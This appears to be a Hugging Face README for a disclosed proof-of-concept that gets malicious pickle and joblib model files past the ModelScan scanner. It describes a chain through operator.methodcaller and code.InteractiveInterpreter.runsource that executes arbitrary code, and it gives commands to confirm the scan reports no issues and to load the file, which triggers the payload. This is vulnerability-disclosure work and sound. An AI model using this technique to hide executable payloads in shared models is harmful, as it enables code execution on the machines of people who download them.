xiaoyaoes's picture
Upload README.md with huggingface_hub
0074a97 verified
|
Raw
History Blame Contribute Delete
1.35 kB
---
tags:
- modelscan
- picklescan
- bypass
- rce
- proof-of-concept
library_name: generic
---
# ModelScan Bypass PoC: `code.InteractiveInterpreter.runsource()` + `operator.methodcaller()`
## Overview
This is a proof-of-concept demonstrating a **new bypass** of ProtectAI ModelScan (v0.8.x),
the model scanner used by HuggingFace to detect malicious pickle models.
## Bypass Mechanism
ModelScan blocks pickle `GLOBAL` opcodes for known dangerous modules (os, subprocess, pickle, builtins.eval, etc.)
but fails to block `code.InteractiveInterpreter` and `operator.methodcaller`.
The exploit chain:
```python
operator.methodcaller("runsource", PAYLOAD)(code.InteractiveInterpreter())
= code.InteractiveInterpreter().runsource(PAYLOAD)
= compile(PAYLOAD) + exec(PAYLOAD)
```
## Files
| File | Format | Description |
|------|--------|-------------|
| `code_bypass.pkl` | Pickle (v5) | Raw pickle file, 171 bytes |
| `code_bypass.joblib` | joblib | .joblib format, 298 bytes |
## Verification
```bash
# Install modelscan
pip install modelscan
# Scan - will report "No issues found"
modelscan --path code_bypass.pkl
# Execute - will run the payload
python -c "import pickle; pickle.load(open('code_bypass.pkl','rb'))"
```
## Disclosure
- **Researcher:** xiaoyaoes
- **Date:** 2026-06-18
- **Status:** Reported via Huntr MFV program